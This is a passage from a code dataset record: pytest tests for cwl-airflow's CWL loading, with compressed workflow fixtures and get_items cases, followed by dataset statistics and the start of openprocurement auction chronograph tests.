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 zhXTfFcVnL/gosFZpps\
/GU8SmShNS4FB6wsEIYqpbGyfu61v/weDmYiG"
)
]
)
def test_fast_cwl_load_workflow_from_compressed_cwl(workflow):
    """fast_cwl_load should parse a compressed workflow string and pickle it.

    Checks both that the parsed tool is a CommentedMap and that a pickle
    named after the workflow's md5 sum appears in pickle_folder.
    """
    pickle_folder = tempfile.mkdtemp()
    pickled_workflow_path = get_md5_sum(workflow) + ".p"
    try:
        workflow_tool = fast_cwl_load(
            workflow=workflow,
            cwl_args={"pickle_folder": pickle_folder}
        )
        pickle_folder_content = os.listdir(pickle_folder)
    except BaseException as err:
        # FIX: was `assert False, ...` — stripped under `python -O` and
        # indistinguishable from an AssertionError raised by the code under
        # test. pytest.fail always reports a proper test failure.
        pytest.fail(f"Failed to run test. \n {err}")
    finally:
        shutil.rmtree(pickle_folder)
    assert isinstance(workflow_tool, CommentedMap), \
        "Failed to parse CWL file"
    assert pickled_workflow_path in pickle_folder_content, \
        "Failed to pickle CWL file"
@pytest.mark.parametrize(
    "workflow",
    [
        (
            ["workflows", "dummy.cwl"]
        )
    ]
)
def test_fast_cwl_load_workflow_from_cwl_should_fail(workflow):
    """fast_cwl_load is expected to raise AssertionError for this workflow."""
    pickle_folder = tempfile.mkdtemp()
    workflow_path = os.path.join(DATA_FOLDER, *workflow)
    with pytest.raises(AssertionError):
        try:
            workflow_tool = fast_cwl_load(
                workflow=workflow_path,
                cwl_args={"pickle_folder": pickle_folder}
            )
        except (FileNotFoundError, SchemaSaladException) as err:
            # BUG FIX: the original `assert False, ...` raised AssertionError,
            # which the surrounding pytest.raises(AssertionError) swallowed —
            # so the test silently passed on the WRONG failure mode.
            # pytest.fail raises Failed (not AssertionError) and therefore
            # escapes the context manager, failing the test as intended.
            pytest.fail(f"Should raise because workflow wasn't found. \n {err}")
        finally:
            shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"workflow",
[
(
"nonenonenone"
),
( # bam-bedgraph-bigwig.cwl
"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\
m3vwGItZCP"
)
]
)
def test_fast_cwl_load_workflow_from_compressed_cwl_should_fail(workflow):
    """fast_cwl_load is expected to raise AssertionError for these inputs."""
    pickle_folder = tempfile.mkdtemp()
    workflow_path = os.path.join(DATA_FOLDER, *workflow)
    with pytest.raises(AssertionError):
        try:
            workflow_tool = fast_cwl_load(
                workflow=workflow,
                cwl_args={"pickle_folder": pickle_folder}
            )
        except (FileNotFoundError, SchemaSaladException) as err:
            # BUG FIX: `assert False` here raised AssertionError, which the
            # enclosing pytest.raises(AssertionError) caught — the test passed
            # even when fast_cwl_load failed for the wrong reason. pytest.fail
            # raises Failed, which is not an AssertionError, so it propagates.
            pytest.fail(
                f"Should raise because workflow didn't include runs or didn't exist. \n {err}"
            )
        finally:
            shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"inputs, target_id, controls",
[
# when target_id is not set
(
[
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bigWig",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
}
],
None,
[
(
"bam_file",
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
}
),
(
"bedgraph_filename",
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename"
}
),
( "bigwig_filename",
{
"type": ["null", "string"],
"doc": "Output filename for generated bigWig",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
}
)
]
),
(
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
None,
[
(
"sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file"
),
(
"sort_bedgraph/sorted_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
)
]
),
(
[
"file:///id/id/id/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///id/id/id//bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
None,
[
(
"sorted_bedgraph_to_bigwig/bigwig_file",
"file:///id/id/id/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
),
(
"sort_bedgraph/sorted_file",
"file:///id/id/id//bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
)
]
),
(
{
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file": {
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
},
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename": {
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
}
},
None,
[
(
"bam_file",
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates"
}
),
(
"bedgraph_filename",
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph"
}
)
]
),
(
[
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
]
],
None,
[
(
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
]
)
]
),
(
10,
None,
[(10, 10)]
),
(
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename",
None,
[
(
"bigwig_filename",
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
)
]
),
(
[],
None,
[]
),
# when target_id is set
(
[
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bigWig",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
}
],
"bam_file",
[
(
"bam_file",
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
}
)
]
),
(
[
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bigWig",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
}
],
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file",
[
(
"bam_file",
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
}
)
]
),
(
[
{
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename"
},
{
"type": ["null", "string"],
"doc": "Output filename for generated bigWig",
"id": "file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
}
],
"dummy",
[]
),
(
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
"sort_bedgraph/sorted_file",
[
(
"sort_bedgraph/sorted_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
)
]
),
(
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file",
[
(
"sort_bedgraph/sorted_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
)
]
),
(
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
"dummy",
[]
),
(
{
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file": {
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
},
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename": {
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
}
},
"bedgraph_filename",
[
(
"bedgraph_filename",
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph"
}
)
]
),
(
{
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file": {
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
},
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename": {
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
}
},
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename",
[
(
"bedgraph_filename",
{
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph"
}
)
]
),
(
{
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bam_file": {
"type": "File",
"doc": "Input BAM file, sorted by coordinates",
},
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#bedgraph_filename": {
"type": ["null", "string"],
"doc": "Output filename for generated bedGraph",
}
},
"dummy",
[]
),
(
[
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
]
],
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
[
(
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
],
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
]
)
]
),
(
[
[
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sorted_bedgraph_to_bigwig/bigwig_file",
"file:///Users/tester/workflows/bam-bedgraph-bigwig.cwl#sort_bedgraph/sorted_file"
]
],
"anything that is not exactly the same as input",
[]
),
(
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename",
"bigwig_filename",
[
(
"bigwig_filename",
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
)
]
),
(
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename",
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename",
[
(
"bigwig_filename",
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename"
)
]
),
(
"file:///Users/kot4or/workspaces/airflow/cwl-airflow/tests/data/workflows/bam-bedgraph-bigwig.cwl#bigwig_filename",
"dummy",
[]
),
(
10,
10,
[(10, 10)]
),
(
10,
12,
[]
),
(
[],
"dummy",
[]
)
]
)
def test_get_items(inputs, target_id, controls):
    """get_items must yield exactly the (key, value) pairs in `controls`."""
    assert list(get_items(inputs, target_id)) == controls
| 46.651509
| 173
| 0.651323
| 6,753
| 106,692
| 10.113875
| 0.10351
| 0.020454
| 0.031611
| 0.040352
| 0.945358
| 0.936588
| 0.929823
| 0.922078
| 0.913805
| 0.909062
| 0
| 0.096118
| 0.274013
| 106,692
| 2,286
| 174
| 46.671916
| 0.785649
| 0.070764
| 0
| 0.704177
| 0
| 0.007862
| 0.157639
| 0.104022
| 0
| 0
| 0
| 0
| 0.019656
| 1
| 0.013268
| false
| 0
| 0.00688
| 0
| 0.020147
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ce378d72c5abaab1283b17e1f95cb21f133b005a
| 9,953
|
py
|
Python
|
openprocurement/auctions/swiftsure/tests/blanks/chronograph_blanks.py
|
bdmbdsm/openprocurement.auctions.swiftsure
|
f5b93555eb12212c69c8168f861376eae85f4648
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/auctions/swiftsure/tests/blanks/chronograph_blanks.py
|
bdmbdsm/openprocurement.auctions.swiftsure
|
f5b93555eb12212c69c8168f861376eae85f4648
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/auctions/swiftsure/tests/blanks/chronograph_blanks.py
|
bdmbdsm/openprocurement.auctions.swiftsure
|
f5b93555eb12212c69c8168f861376eae85f4648
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from openprocurement.auctions.core.utils import get_now
# AuctionSwitchQualificationResourceTest
def switch_to_qualification(self):
    """An empty chronograph patch moves the auction into active.qualification
    and produces exactly one award."""
    self.set_status('active.auction', {'status': self.initial_status})
    self.app.authorization = ('Basic', ('chronograph', ''))
    url = '/auctions/{}'.format(self.auction_id)
    response = self.app.patch_json(url, {'data': {'id': self.auction_id}})
    self.assertEqual(response.status, '200 OK')
    self.assertEqual(response.content_type, 'application/json')
    data = response.json['data']
    self.assertEqual(data["status"], "active.qualification")
    self.assertEqual(len(data["awards"]), 1)
# AuctionAuctionPeriodResourceTest
def set_auction_period(self):
    # Chronograph-driven flow: an empty patch makes the server recalculate
    # auctionPeriod.shouldStartAfter; later patches set and then clear startDate.
    self.app.authorization = ('Basic', ('chronograph', ''))
